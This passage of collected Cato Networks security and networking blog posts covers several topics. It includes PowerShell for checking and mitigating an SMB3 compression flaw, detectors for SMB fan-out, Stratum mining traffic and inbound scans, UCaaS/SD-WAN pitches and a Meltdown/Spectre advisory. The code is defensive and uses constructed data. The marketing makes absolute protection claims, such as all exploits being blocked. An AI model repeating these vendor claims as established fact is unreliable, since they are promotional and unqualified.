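    # Microsoft's documented workaround. Protects this host's SMB *server* role only;
    # as an SMB *client* the host stays exposed to a malicious server until patched.
    Set-ItemProperty -Path $SmbServerParams -Name DisableCompression -Type DWORD -Value 1 -Force
}

function Get-Smb3RceExposure {
    param([string]$PatchKb)   # assumed input: KB id from Microsoft's advisory for this build
    $cv    = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build = [int]$cv.CurrentBuildNumber
    # Builds that ship SMB 3.1.1 compression: 18362 = version 1903, 18363 = version 1909
    $affected = @(18362, 18363) -contains $build
    $patched  = $false
    if ($PatchKb) { $patched = $null -ne (Get-HotFix -Id $PatchKb -ErrorAction SilentlyContinue) }
    $compressionOff = Test-Smb3CompressionDisabled
    [pscustomobject]@{
        Computer            = $env:COMPUTERNAME
        ReleaseId           = $cv.ReleaseId
        Build               = "$build.$($cv.UBR)"
        AffectedBuild       = $affected
        PatchInstalled      = $patched
        CompressionDisabled = $compressionOff
        ServerExposed       = $affected -and -not $patched -and -not $compressionOff
        ClientExposed       = $affected -and -not $patched
    }
}

function Set-InboundSmbScope {
    # Host-level segmentation for TCP 445. Without -AllowedRemote (a workstation that serves
    # no shares) inbound SMB is blocked outright. With -AllowedRemote (a file server), the
    # built-in allow rules are disabled and one allow rule scoped to those subnets is added;
    # the profile's default inbound action (Block) then drops SMB from everywhere else.
    param([string[]]$AllowedRemote)   # assumed input, e.g. @('10.0.10.0/24')
    Get-NetFirewallRule -DisplayGroup 'File and Printer Sharing' -Direction Inbound -ErrorAction SilentlyContinue |
        Disable-NetFirewallRule
    if ($AllowedRemote) {
        New-NetFirewallRule -DisplayName 'SMB-In (scoped to file-server subnets)' -Direction Inbound `
            -Protocol TCP -LocalPort 445 -RemoteAddress $AllowedRemote -Action Allow | Out-Null
    } else {
        New-NetFirewallRule -DisplayName 'SMB-In (blocked on this host)' -Direction Inbound `
            -Protocol TCP -LocalPort 445 -Action Block | Out-Null
    }
}

# Usage: assess first, then mitigate only where the host is still exposed.
$state = Get-Smb3RceExposure -PatchKb 'KB0000000'   # placeholder: use the KB from the advisory
$state | Format-List
if ($state.ServerExposed) {
    Disable-Smb3Compression
    Set-InboundSmbScope          # workstation: no inbound SMB at all
}
```

Note the split between ServerExposed and ClientExposed: the registry workaround clears the first but not the second, which is why patching, not the workaround, is the end state. For fleet-wide rollout the DisableCompression value is the natural candidate for a Group Policy registry item, and the firewall rules for a GPO-managed Windows Defender Firewall policy.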
How Cato Protects You
There are two ways Cato protects its customers. Thanks to its cloud-native architecture, Cato continually maintains and updates its extensive security stack across every Cato PoP, protecting all communications across the Cato network, whether a branch office or mobile user connects over the Cato backbone to the datacenter or with another branch office or mobile user. Cato’s cloud-native architecture applied all security updates, including the IPS signature for this newly announced vulnerability, shortly after Microsoft released its advisory. Enterprise IT doesn’t have to do anything, such as updating a security appliance. All exploits that take advantage of this vulnerability are already blocked as long as your IT department has set the Cato IPS for Block mode on all traffic scopes (WAN, Inbound and Outbound).
Figure 2: Apply Block Settings to All Traffic Scopes
Even without this IPS update, however, Cato’s security stack uses other means to detect and alert on any traffic anomalies that could indicate an attack, even a zero-day attack. For example, if a host normally communicates using SMB with one or two other hosts and then suddenly communicates with hundreds of hosts, Cato’s IPS will detect those anomalous flows. It can alert IT or even cut off the flows depending on configuration. This may not block an attack completely, but it will allow IT to limit the damage and apply necessary measures to prevent the attack in the future.
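The fan-out anomaly described above, as an added example that is not Cato's detection logic: per source host, count the distinct SMB peers contacted in the current hour and compare it with the largest count seen in any prior hour. The flow records, hosts, addresses and thresholds are all constructed for the example.

```powershell
# Added example (not Cato's detection logic): flag a host whose distinct SMB peer count
# jumps far above its own history. Flow records below are constructed.

function Find-SmbFanOutAnomaly {
    param(
        [Parameter(Mandatory)][object[]]$Flows,   # objects with Src, Dst, DstPort, Hour
        [Parameter(Mandatory)][int]$CurrentHour,
        [int]$BaselineHours = 24,                 # history window to learn "normal" from
        [double]$Multiplier = 5,                  # alert when peers exceed this x the prior max
        [int]$MinPeers = 10                       # never alert below this absolute count
    )
    $smb      = $Flows | Where-Object { $_.DstPort -eq 445 }
    $baseline = $smb | Where-Object { $_.Hour -lt $CurrentHour -and $_.Hour -ge ($CurrentHour - $BaselineHours) }
    $current  = $smb | Where-Object { $_.Hour -eq $CurrentHour }

    $results = foreach ($g in ($current | Group-Object Src)) {
        $src      = $g.Name
        $peersNow = @($g.Group | Select-Object -ExpandProperty Dst -Unique).Count
        # Baseline = the most distinct SMB peers this source talked to in any single prior hour
        $maxPrior = 0
        foreach ($hg in ($baseline | Where-Object Src -eq $src | Group-Object Hour)) {
            $c = @($hg.Group | Select-Object -ExpandProperty Dst -Unique).Count
            if ($c -gt $maxPrior) { $maxPrior = $c }
        }
        # A host with no history still needs at least MinPeers before it is flagged
        $threshold = [math]::Max($MinPeers, $Multiplier * $maxPrior)
        [pscustomobject]@{
            Src           = $src
            PeersNow      = $peersNow
            MaxPriorPeers = $maxPrior
            Threshold     = $threshold
            Anomalous     = ($peersNow -gt $threshold)
        }
    }
    return $results
}

# --- Constructed flow records: 24 quiet hours, then one noisy hour ---
$Flows = New-Object System.Collections.Generic.List[object]
foreach ($h in 0..23) {
    foreach ($d in '10.0.10.5', '10.0.10.6') {            # finance workstation -> two file servers
        $Flows.Add([pscustomobject]@{ Src = '10.0.20.15'; Dst = $d; DstPort = 445; Hour = $h })
    }
    $Flows.Add([pscustomobject]@{ Src = '10.0.20.16'; Dst = '10.0.10.5'; DstPort = 445; Hour = $h })
}
# Hour 24: 10.0.20.15 reaches out to 60 hosts on 445 (worm-like); 10.0.20.16 is unchanged
foreach ($i in 1..60) {
    $Flows.Add([pscustomobject]@{ Src = '10.0.20.15'; Dst = "10.0.30.$i"; DstPort = 445; Hour = 24 })
}
$Flows.Add([pscustomobject]@{ Src = '10.0.20.16'; Dst = '10.0.10.5'; DstPort = 445; Hour = 24 })

Find-SmbFanOutAnomaly -Flows $Flows -CurrentHour 24 | Format-Table -AutoSize
```

The baseline is per host rather than global, so a backup server that legitimately touches hundreds of peers every night does not raise the bar for a workstation that normally touches two. On real flow data the same logic is applied per time bucket as records arrive, and the thresholds are tuned against a few weeks of history before alerts are allowed to block.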
We’ll continue to keep you abreast of any critical Windows vulnerabilities in the future. Cato customers can rest assured that Cato will take all possible measures to protect their networks against new vulnerabilities, immediately.
Reducing WAN Spend when Adopting UCaaS
Unified Communications-as-a-Service (UCaaS) is increasingly attractive to organizations looking to eliminate the cost of operating on-premises platforms and PSTN access contracts. However, those looking to adopt UCaaS to save money may be in for a nasty surprise.
UCaaS offerings move unified communications capabilities — integrated calling, conferencing, and messaging applications — normally delivered from on-premises servers, into the cloud. The idea, like so many cloud services, is that UCaaS will lower the adoption barrier by eliminating capital expenses to procure new applications, while also reducing UC implementation and operational costs - and to an extent that’s true.
Our research also shows, though, that many enterprises experience an increase in WAN costs to support connectivity to the cloud. Approximately 38% of companies benchmarked by Nemertes Research in 2018 saw their WAN costs rise as a result of their adoption of UCaaS, with a mean increase in spend of 23.5%. More than a third cited rising network costs as the biggest contributor to increased UC operational spend in their first year of moving to the cloud.
What’s driving these network cost increases? Two factors in particular:
The need to increase bandwidth between the organization and the Internet to support connectivity to the UCaaS provider
The need to add bandwidth between locations to support new features commonly available from UCaaS providers, like video conferencing.
Those seeing rising network costs typically purchase additional MPLS bandwidth from their existing WAN supplier(s). They have not yet begun to deploy SD-WAN to add bandwidth, support real-time applications, and reduce WAN spend.
SD-WAN reduces WAN expense by virtualizing network access services, allowing organizations to replace or reduce expensive MPLS access links with lower cost Internet services while maintaining necessary performance and reliability to support voice and video communications. Emerging SD-WAN service providers further build upon the benefits of SD-WAN by offering guaranteed end-to-end performance across the globe, as well as direct network connectivity to many UCaaS providers, enabling efficient call flows.
Additional cost reductions result from collapsing the branch stack, replacing dedicated firewalls, WAN optimizers, session border controllers, and routers with converged functions that run features as virtual instances on a virtual customer-premises equipment (vCPE) or are provided by the SD-WAN. Nemertes also finds that network management costs decline on average by 20% for those organizations who have converted at least 90% of their WAN to SD-WAN.
An example of real-world potential savings is shown below. In this scenario, a 200-site organization using MPLS spends $3.476 million per year on network costs. Shifting to 100% SD-WAN reduces those costs to $2.154 million, a net savings of $1.321 million per year.
SD-WAN adoption results in further demonstrable benefits, including improved resiliency by adding secondary network connections to branch offices, faster turn-up of new branch offices, and the ability to increase branch office bandwidth more rapidly.
Those considering, or adopting UCaaS would be wise to evaluate the impact that UCaaS adoption will have on their network, particularly with regard to demands for additional bandwidth to support video conferencing, and the need for high resiliency, low latency, and low jitter network performance. Evaluate SD-WAN as a means of meeting the performance and reliability needs of UCaaS while reducing WAN spend.
Optimizing UCaaS Access with SD-WAN Services
One of the key requirements of Unified Communications-as-a-Service (UCaaS) is the ability to connect to service providers via the Internet. As I discussed in my previous blog, few companies, especially global organizations, have Internet access at every branch. UCaaS traffic must be backhauled across the WAN to an Internet access point, resulting in inefficient traffic routing for voice and video calls, and potential quality issues related to excessive delay and jitter.
To remedy this situation, network architects have two primary options: “Meet Me” direct connect services that establish a dedicated link (or links) between the enterprise’s network, and the UCaaS provider’s network, or SD-WAN.
Direct connect options extend the enterprise WAN so that the UCaaS provider appears as just another node on the network. Once the direct connection is established, typically via Ethernet or MPLS, all sites are able to reach the UCaaS provider’s datacenter without having to traverse enterprise Internet connection points. An architectural example is shown below.
Figure 1: Direct Connect to UCaaS Provider
Approximately 16% of the more than 300 end-user organizations participating in Nemertes’ recent “WAN Economics 2018-19” research study currently use these types of services to connect to their cloud provider.
UCaaS providers typically offer direct connect services to their data centers for an additional fee (on top of the cost of the circuit or circuits). Examples include AWS Direct Connect (for AWS Chime), Cisco Webex Edge (for Cisco Webex), Google Cloud Interconnect (for G Suite), Microsoft ExpressRoute (for Office 365), and RingCentral CloudConnect (for RingCentral Office). Another downside to this approach is that not all UCaaS providers support this connectivity model.
Another option is the use of WAN-Cloud exchanges. Like the direct connect model, a WAN-Cloud exchange allows an organization to directly connect its existing data network to a UCaaS provider, but only if both have a presence in a co-location facility. A WAN-Cloud exchange may allow an enterprise to easily connect to multiple cloud providers who have a presence within a co-location facility. An architectural model for this approach is shown below:
Figure 2: WAN-Cloud Exchange Access to UCaaS Provider
Here, the customer purchases an interconnect service provided and managed by the co-location provider (e.g. Equinix, Megaport, etc.), and like the earlier direct connect example, the customer must pay an additional fee for this service, and their UCaaS provider must support this connectivity option. Approximately 13% of organizations use carrier exchange services today to connect to their provider(s).
In both of these direct connect models the customer is responsible for ensuring security of the connection between their network, and the UCaaS provider’s network, potentially creating additional cost by adding the need for firewalls and/or application layer gateways at connection points. And, customers must establish separate direct connect services for all of their cloud providers.
The second approach entails leveraging SD-WAN services as the means of connectivity to the UCaaS provider. Unlike simply extending your existing data network to your UCaaS provider, SD-WAN services offer the option to reduce WAN spend by off-loading UCaaS (and other SaaS) traffic onto lower-cost Internet connection links, improve resiliency, and guarantee performance for latency sensitive traffic like VOIP. SD-WAN virtualizes available access circuits, routing traffic over the ideal path for a given application type. Some SD-WAN service providers offer direct connect connectivity from their own networks to UCaaS providers.
In the case of UCaaS, SD-WAN will pick paths that meet UCaaS requirements for delay and jitter. Some SD-WAN services also provide detailed voice and video quality performance information, and managed security between your network and the UCaaS provider, protecting against potential SIP attacks including data exfiltration and denial of service. Twenty-three percent of our research participants are using SD-WAN today, reporting on average a 20% reduction in WAN management resource requirements, a 33% reduction in troubleshooting time, fewer site outages, and faster recovery time.
An architectural model for in-net SD-WAN is shown below:
Figure 3: SD-WAN Architectural Model
Here, branch offices connect to SD-WAN provider points of presence over the Internet. The enterprise’s logical, virtual WAN is created by the service provider; the provider’s service cloud delivers SD-WAN functionality like routing traffic on the ideal path to support the performance and resilience needs of UCaaS traffic while minimizing cost. One way an SD-WAN service provider can optimize delivery to a UCaaS provider is by selecting an optimal Internet egress point, close to the UCaaS provider, so the last hop across the Internet is a short hop. Another way is to place a POP in the same facility as the UCaaS provider and deliver traffic to its network within the facility, or engineer a dedicated link to a nearby location, the net result being that the Internet is out of the picture for the last hop.
If you are adopting or considering adopting UCaaS make sure to evaluate how you will connect to your UCaaS provider. Consider SD-WAN services for their ability to reduce WAN spend while meeting UCaaS performance, management, and security requirements.
Tales from the Trenches: What I Love About My Cato Cloud
I’ve been an IT manager for a long time, only recently joining the Cato team. Prior to Cato, you might say that I lived my life in a box — a Cisco box, a Palo Alto box, a Checkpoint box… you get the point. Now, as the IT manager at Cato, I’ve been using Cato Cloud to run Cato’s internal network. I’ve seen firsthand how Cato can simplify the life of an IT manager. Below are some of my tips and observations on how I’ve gotten the most out of being “out of the box” with this cloud-based security and networking service.
Bye, bye VPN. I don’t know about you, but I’ve never liked my mobile VPN. It’s a pain to configure, and even once you get it operational, performance can be pretty debilitating. I used to field many complaints from salespeople or executives on the road as to “how $%^* bad my mobile connection is working.” When I got to Cato, I fell in love with Cato Cloud’s mobile capabilities. The Cato mobile client works faster than any VPN I’ve experienced. Instead of having to connect back to a home office across the globe, the Cato mobile client connects to the nearest Cato PoP regardless of where in the world the device is. All of which cuts latency down because the traffic has less distance to travel and, more importantly, makes for happier roaming executives.
The cloud in my pocket. Before joining Cato, my users would constantly complain about the performance of cloud resources. With the Cato Cloud, my offices feel like they sit right next to the biggest cloud services around, like AWS, Azure, Office 365 and Jira. The performance is that good. That’s because Cato co-locates many of our PoPs in the same physical data centers as the IXPs of leading cloud providers. I’ve been able to configure rules such that our Office 365 traffic from our Tel Aviv office, for example, enters through our Tel Aviv PoP, travels across the Cato Cloud network and, then egresses in Amsterdam right next to the Internet destination. The alternative would have been sending the traffic across the Internet core which is always a crapshoot.
A huge time saver. I used to waste what felt like hours each month jumping between consoles, figuring out new UIs, and the like. The simplicity of managing my Cato network has meant I can save a ton of time on the most mundane things like setting up security policies, onboarding new users, or managing a branch. I can’t quantify exactly how much time has been saved, but I can tell it’s a lot. Who couldn’t use more time in their workday?
The eye in the sky. Cato gives me real-time transport monitoring through a single pane of glass. This helps me keep an eye on the Internet lines, in particular, in the event of a slowdown during the workday. In the days before we enabled bandwidth throttling, a worker started to upload 520 GB of files to Amazon S3, hogging the site’s upstream capacity. I was quickly able to see which user, what application and what type of traffic was responsible for this massive slowdown and, politely, get him to stop.
Real-time network monitoring makes me look smarter than my users. I use Cato’s analytics to monitor our Internet service usage and the connectivity of our branches. If there’s a problem, I’m the first one to get notified. I get a good chuckle when my sales guys in Atlanta are surprised to find out that they’re having an Internet problem — and I’m already working on it from halfway across the globe.
Security is so much simpler than with a traditional network. With traditional firewalls and security appliances, you need to know the nuances of the different systems you’re working with. They might all block access to specific IPs, but some have you thinking in terms of applications while most others build rules based on IP. The transition can be confusing, and that’s just one example. Security rules in Cato Cloud were, well, simple. I could choose to define rules however was most comfortable for me — by IP, application, and even by user identity. There aren’t a lot of “vendor extensions” that need to be mastered just to get your security going. If you know the basics of firewall operation, that’s enough.
Keeping tabs on security. In most legacy systems that I worked with there was a possibility of receiving a daily or weekly report of security incidents but nothing in real-time. Even with a SIEM, we’d need to have someone examine the logs and reports to determine if there’s been an attack. It meant I was constantly reacting to incidents, a step behind the attackers launching the attacks and often the users who were calling about them. Cato’s real-time alert security notifications put me ahead of our security threats and complaints. I receive email notifications when “something’s up” and can take action right from my mobile device, if necessary.
As an IT manager, I appreciate the simplicity of setting up and managing my company’s network and all the security we need for our users, branches, applications, and data. Cato Cloud might have been early when I first looked at it years ago, but now it’s definitely time for everything the Cato Cloud has to offer.
Why Traditional MPLS Networks are Ill-Suited for UCaaS
Unified Communications as a Service (UCaaS) adoption is on the rise in the enterprise, and with it comes significant impact for IT managers planning their MPLS network transformation. I’ll be taking a deeper look into those challenges in this week’s webinar, but here’s a quick preview.
What’s UC and why UCaaS
Like UC, UCaaS improves team collaboration by packaging calling, meetings, and team collaboration into a seamless experience. But while UC brings the cost and complexity of hosting and maintaining server infrastructure in the enterprise datacenter, UCaaS avoids those problems by putting UC in the cloud. Organizations gain flexibility, easy adoption, predictable costs, and quick access to emerging features that are first, and in many cases only, available via the cloud.
The UCaaS challenge for modern WANs
For all of its benefits, UCaaS poses significant challenges for traditional enterprise network architectures.
Most enterprise data networks are still optimized for a computing model in which the bulk of applications reside in the datacenter. Clients - including browser, native app, and those running within virtual desktop infrastructure - are used to interact with applications and data stores either in enterprise-owned facilities or within co-location providers connected to the enterprise network via Ethernet and MPLS. Internet access remains tightly controlled, with only large, or headquarters facilities having local Internet connectivity. Thus, all access to Internet-based apps requires routing flows from the branch to the headquarters or datacenter location, and then out to the Internet.
This approach is ill-suited to a rapidly changing application delivery model in which apps may reside in public cloud infrastructure (e.g. Platform-as-a-Service (PaaS) and Infrastructure-as-a-Service (IaaS)) or are obtained from software-as-a-service (SaaS) providers. This is especially true for those adopting Unified Communications-as-a-Service (UCaaS), because excessive latency and variable network performance translate directly into poor voice and video quality.
Consider the scenario in which a worker at a branch office calls a worker at another branch office. In the centralized Internet access architectural model, that call would go from the originating branch, out the nearest Internet connection point, to the UCaaS provider, and then back in the Internet connection point nearest to the destination branch as shown below:
This inefficient routing of call traffic is likely to lead to poor call performance, as well as potentially overloaded Internet connection points, especially when using high-bandwidth apps like video-conferencing and video streaming.
SD-WANs and needed changes for better UCaaS experience
What’s needed is a rethinking of network architectures, one that is optimized for UCaaS. In this new model, Internet access is available at every branch, ensuring that each branch is able to reach the UCaaS provider as efficiently as possible.
But simply connecting all branches to the Internet creates security challenges and may not provide sufficient performance to support real-time applications. The answer? SD-WAN. SD-WAN enables organizations to bring direct Internet connectivity to all branch offices and may provide performance guarantees to ensure that latency and jitter levels meet the needs of real-time applications.
At the branch, SD-WAN virtualizes wide area network access services, enabling branch office traffic to be sent along the optimal route for its performance needs. SD-WAN services that provide their own backbone can also optimize traffic globally, avoiding the potential performance issues of Internet-based services (see below).
Furthermore, leveraging SD-WAN services that offer security management can reduce operating costs and headaches, saving enterprise customers the expense and complexity of managing distributed Internet access points. Such services can apply consistent policies at all branches without additional branch hardware, and they can protect against UC-specific attacks including SIP exfiltration (in which SIP requests are used to obtain data from endpoints running SIP softphones) as well as denial of service attacks.
Learn more about SD-WAN and UCaaS
The result of using SD-WAN is a modern data network, optimized for cloud-based applications, and able to support the unique performance requirements of UCaaS. To learn more about SD-WAN and UCaaS, join me and Dave Greenfield, Cato’s technology evangelist, on this week’s webinar.
The Crypto Mining Threat: The Security Risk Posed By Bitcoin and What You Can Do About It
With Bitcoin, and cryptocurrencies in general, growing in popularity, many customers have asked Cato Research Labs about Bitcoin security risks posed to their networks.
Cato Research Labs examined crypto mining and the threats posed to the enterprise. While immediate disruption of the network or loss of data is unlikely to be a direct outcome of crypto mining, increased facility costs may result. Indirectly, the presence of crypto mining software likely indicates a device infection.
Customers of Cato’s IPS as a service are protected against the threats posed by crypto mining. Non-Cato customers should block crypto mining on their networks. This can be done by disrupting the process of joining and communicating with the crypto mining pool, either by blocking the underlying communication protocol or by blocking crypto mining pool addresses and domains. For a list of addresses and domains you should block, click here.
The Risk of Crypto Mining and What You Can Do
Crypto mining is the validating of bitcoin (or other cryptocurrency) transactions and the adding of encrypted blocks to the blockchain. Miners establish a valid block by solving a hash, receiving a reward for their efforts. The possibility of compensation is what attracts miners, but it’s the need for compute capacity to solve the hash that leads miners to leverage enterprise resources.
Mining software poses direct and indirect risks to an organization:
Direct: Mining software is compute intensive, which will impact the performance of an employee’s device. Running processors at a “high-load” for a long time will increase electricity costs. The life of a processor or the battery within a laptop may be shortened.
Indirect: Some botnets are distributing native mining software, which accesses the underlying operating system in a way similar to how malware exploits a victim’s device. The presence of native mining software may well indicate a compromised device.
Cato Research Labs recommends blocking crypto mining. Preferably, this should be done using the deep packet inspection (DPI) engine in your firewalls. Configure a rule to detect and block the JSON-RPC messages used by Stratum, the protocol mining pools use to distribute tasks among member computers. DPI rules should be configured to block based on three fields which are required in Stratum subscription requests: id, method, and params.
However, DPI engines may lack the capacity to inspect all encrypted traffic. Blocking browser-based mining software may be a problem, as Stratum often runs over HTTPS. Instead, organizations should block access to the IP addresses and domains used by public blockchain pools.
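The two controls described above, the Stratum signature match and the pool blocklist, as an added example in Python (not Cato’s code or rule syntax); the blocklist entries and the sample payloads are constructed placeholders.

```python
"""Detect Stratum mining-pool traffic the way the DPI rule above describes.

Stratum carries one JSON-RPC object per line; a subscription request must
have "id", "method" and "params", and Stratum method names start with
"mining.". The blocklist entries and the sample payloads are constructed.
"""
import json
from dataclasses import dataclass

STRATUM_FIELDS = {"id", "method", "params"}

# Constructed placeholder entries; a real deployment imports a maintained list.
POOL_BLOCKLIST = {"pool.placeholder-mining.test", "203.0.113.10"}


@dataclass
class Verdict:
    blocked: bool
    reason: str


def is_stratum_request(line: str) -> bool:
    """True when one line is a Stratum JSON-RPC message (mining.subscribe etc.)."""
    try:
        msg = json.loads(line)
    except ValueError:
        return False
    if not isinstance(msg, dict) or not STRATUM_FIELDS.issubset(msg):
        return False
    method = msg.get("method")
    return (isinstance(method, str) and method.startswith("mining.")
            and isinstance(msg["params"], list))


def inspect(dst_host: str, payload: bytes) -> Verdict:
    """Apply the two controls from the post: destination blocklist, then DPI."""
    if dst_host in POOL_BLOCKLIST:
        return Verdict(True, "destination is a known mining pool")
    try:
        text = payload.decode("utf-8")
    except UnicodeDecodeError:
        # TLS records or other binary: DPI has nothing to match on, which is
        # exactly the gap the address blocklist is meant to cover.
        return Verdict(False, "opaque payload, DPI cannot inspect")
    for line in text.splitlines():
        if is_stratum_request(line.strip()):
            return Verdict(True, "stratum " + json.loads(line)["method"])
    return Verdict(False, "no stratum signature")


# Constructed sample flows: name -> (destination host, first payload bytes).
SAMPLE_FLOWS = {
    "miner": ("198.51.100.5",
              b'{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}\n'),
    "other_rpc": ("198.51.100.6",
                  b'{"id": 7, "method": "status.get", "params": []}\n'),
    "tls": ("198.51.100.7", b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03\xff\xfe"),
    "listed": ("203.0.113.10", b"\x16\x03\x01\x00\xa5\xff"),
}


def run_samples() -> dict:
    """Inspect every constructed flow and return the verdicts by name."""
    return {name: inspect(dst, data) for name, (dst, data) in SAMPLE_FLOWS.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:10} blocked={str(verdict.blocked):5} {verdict.reason}")
```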
Despite our best efforts, no such list of pool addresses or domains could be found, which led Cato Research Labs to develop its own blacklist. Today, the list identifies hundreds of pool addresses. The list can be downloaded here for import into your firewall.
Cryptocurrency mining may not be the gravest threat to enterprise security, but it should not be ignored. The risk of impaired devices, increased costs, and infections means removing mining software warrants immediate attention. The blacklist of addresses provided by Cato Research Labs will block access to existing public blockchain pools, but not new pools or addresses. That is why Cato Research strongly recommends configuring DPI rules on DPI engines that have sufficient capacity to inspect all encrypted sessions.
Advisory: Why You Should (Still) Care About Inbound Network Scans
In the light of recent ransomware attack campaigns against Microsoft RDP servers, Cato Research assessed the risk network scanning poses to organizations. Although well researched, many organizations continue to be exposed to this attack technique. Here’s what you can (and should) do to protect your organization.
What is Network Scanning?
Network scanning is a process for identifying active hosts on a network. Different techniques may be used. In some cases, network scanners will use port scans and in other cases ping sweeps. Regardless, the goal is to identify active hosts and their services.
Network scanning is commonly associated with attackers but not every network scan indicates a threat. Some scanners are benign and are part of various research initiatives. The University of Pennsylvania, for example, uses network scanning in the study of global trends in protocol security. However, while research projects will stop at scanning Internet IP-ranges for potentially open services, malicious actors will go further and attempt to hack or even gain root privilege on remote devices.
What Services Are Normally Targeted By Network Scanning?
While some scans target specific organizations, most scans over the Internet are searching for vulnerable services where hackers can execute code on the remote device.
Occasionally, after a new vulnerability in a service is publicly disclosed, a massive scan for this service will follow. Attackers may try to gain control of IoT devices or routers and control them using a bot that may be used later for DDoS attacks (such as the Mirai botnet) or even cryptocurrency mining, which is very popular these days.
In addition, hackers may exploit known vectors in websites that serve many users, such as WordPress vulnerabilities. Such sites can then be used as a source for drive-by attacks to compromise end-user machines on a large scale.
How Widespread Are Network Scanning Attacks?
We’ve seen that some organizations continue to expose services unnecessarily to the world. Those services are being scanned, which exposes them to attack.
During a two-week period, Cato Research observed scans from thousands of scanners. More than 80% of the scanners originated from China, Latvia, Netherlands, Ukraine or the US (see figure 1).
Figure 1 - Top countries originating scans
When we look at the types of the scanned services, most scans targeted SQL, Microsoft RDP (Remote Desktop Protocol) and HTTP for different reasons (see figure 2). The large number of RDP scans is due to a variety of disclosed vulnerabilities in RDP, exploited by recent ransomware attack campaigns using password-guessing, brute force attacks on Microsoft RDP servers.
As for SQL servers, it seems the hunt for databases continues. Servers running SQL tend to contain the most valuable information from the attacker’s perspective: personal details, phone numbers, and credit card information. This also applies to attacks on web servers, which may store valuable information about website users, such as their email addresses and passwords.
Figure 2 - HTTP, RDP, and SQL were the most scanned services
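Spotting scanners in your own firewall logs and tallying which services they probe, as in Figure 2, as an added Python example (not Cato’s code). The deny-log format, the threshold values and the sample lines are constructed; a port scan is flagged when one source probes many distinct ports within a time window, and a sweep when one source probes the same port on many hosts.

```python
"""Flag inbound scanners in firewall deny logs and tally the services probed.

Constructed example: the syslog-style deny format, the thresholds and the
sample lines are all assumptions, not a real product's log format.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

LOG_RE = re.compile(r"^(?P<ts>\S+) DENY src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
                    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+)$")

# Ports behind the services in Figure 2, plus a few other common ones.
SERVICE_NAMES = {80: "HTTP", 443: "HTTPS", 3389: "RDP", 1433: "SQL", 3306: "SQL", 22: "SSH"}


@dataclass
class Event:
    ts: datetime
    src: str
    dst: str
    dport: int


def parse_line(line: str):
    """Parse one deny line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return Event(datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"]))


def find_scanners(lines, window_s=300, min_ports=10, min_hosts=10) -> dict:
    """Return {source_ip: "port scan" | "sweep"} for sources that trip a threshold."""
    per_src = defaultdict(list)
    for ev in map(parse_line, lines):
        if ev:
            per_src[ev.src].append(ev)
    findings = {}
    for src, evs in per_src.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end, ev in enumerate(evs):
            # Slide the window start forward so it spans at most window_s seconds.
            while (ev.ts - evs[start].ts).total_seconds() > window_s:
                start += 1
            window = evs[start:end + 1]
            if len({e.dport for e in window}) >= min_ports:
                findings[src] = "port scan"
                break
            if len({e.dst for e in window}) >= min_hosts:
                findings[src] = "sweep"
                break
    return findings


def service_histogram(lines) -> Counter:
    """Count denied probes per service name, the view Figure 2 gives."""
    hist = Counter()
    for ev in map(parse_line, lines):
        if ev:
            hist[SERVICE_NAMES.get(ev.dport, "other")] += 1
    return hist


def constructed_log() -> list:
    """Constructed sample: one port scanner, one RDP sweeper, one benign client."""
    t0 = datetime(2018, 1, 15, 10, 0, 0)
    lines = []

    def deny(ts, src, dst, port):
        lines.append(f"{ts.isoformat()} DENY src={src} dst={dst} dport={port} proto=tcp")

    for i, port in enumerate([21, 22, 23, 25, 80, 110, 135, 139, 443, 445, 1433, 3389]):
        deny(t0 + timedelta(seconds=2 * i), "198.51.100.7", "192.0.2.10", port)
    for i in range(12):
        deny(t0 + timedelta(seconds=3 * i), "203.0.113.44", f"192.0.2.{20 + i}", 3389)
    for i, port in enumerate([80, 443, 22]):
        deny(t0 + timedelta(minutes=i), "192.0.2.55", "192.0.2.10", port)
    return lines


if __name__ == "__main__":
    log = constructed_log()
    print(find_scanners(log))
    print(service_histogram(log).most_common())
```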
Organizations should protect themselves from scanning attacks with the following actions:
Whenever possible, the organization should not expose servers to the Internet. They should only make them accessible via the WAN firewall to sites and mobile users connected to Cato Cloud.
If a server needs to be accessed from the public Internet, we recommend limiting access to specific IP addresses or ranges. This can be easily done by configuring Remote Port Forwarding in the Cato management console. When IP access rules are not enough, consider applying IPS geo-restriction rules to deny any inbound connections from “riskier” regions, such as China, Latvia, the Netherlands or Ukraine.
If none of the above can be applied, we recommend using Cato IPS rules to help block the various attempts to attack the server.
Network scanning may be a well-known technique, but that doesn’t diminish its effectiveness. Be sure to apply these recommendations to prevent attackers from using this technique to penetrate your network.
The Meltdown-Spectre Exploits: Lock-down your Servers, Update Cloud Instances
The much publicized critical CPU vulnerabilities published last week by Google’s Project Zero and its partners will have their greatest impact on virtual hosts or those servers where threat actors can gain physical access.
The vulnerabilities, named Meltdown and Spectre, are hardware bugs that can be abused to leak information from one process to another, or from the underlying operating system to a process running on it. More specifically, the vulnerability stems from speculatively executed instructions that allow arbitrary virtual memory reads, bypassing the process isolation enforced by the operating system and processor. Such unauthorized memory reads may reveal sensitive information, such as passwords and encryption keys. These vulnerabilities affect many modern CPUs including Intel, AMD and ARM.
Cato Research Labs analyzed the security impact of the Spectre (CVE-2017-5753 and CVE-2017-5715) and Meltdown (CVE-2017-5754) vulnerabilities on Cato Cloud and our customers’ networks. Any measures needed to protect the software or hardware have been taken by Cato.
We highly recommend that Cato customers follow their cloud provider’s guidelines for patching the operating systems running in the virtual machines of their cloud hosts. Most cloud providers have already patched the underlying hypervisors. Specific patching instructions can be found here for Microsoft Azure, Amazon AWS, and Google Cloud Platform.
Additional information about the attacks is described in Google Project Zero blog. Meltdown was discovered by Jann Horn at Google Project Zero; Werner Haas and Thomas Prescher at Cyberus Technology; and Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz at the Graz University of Technology.
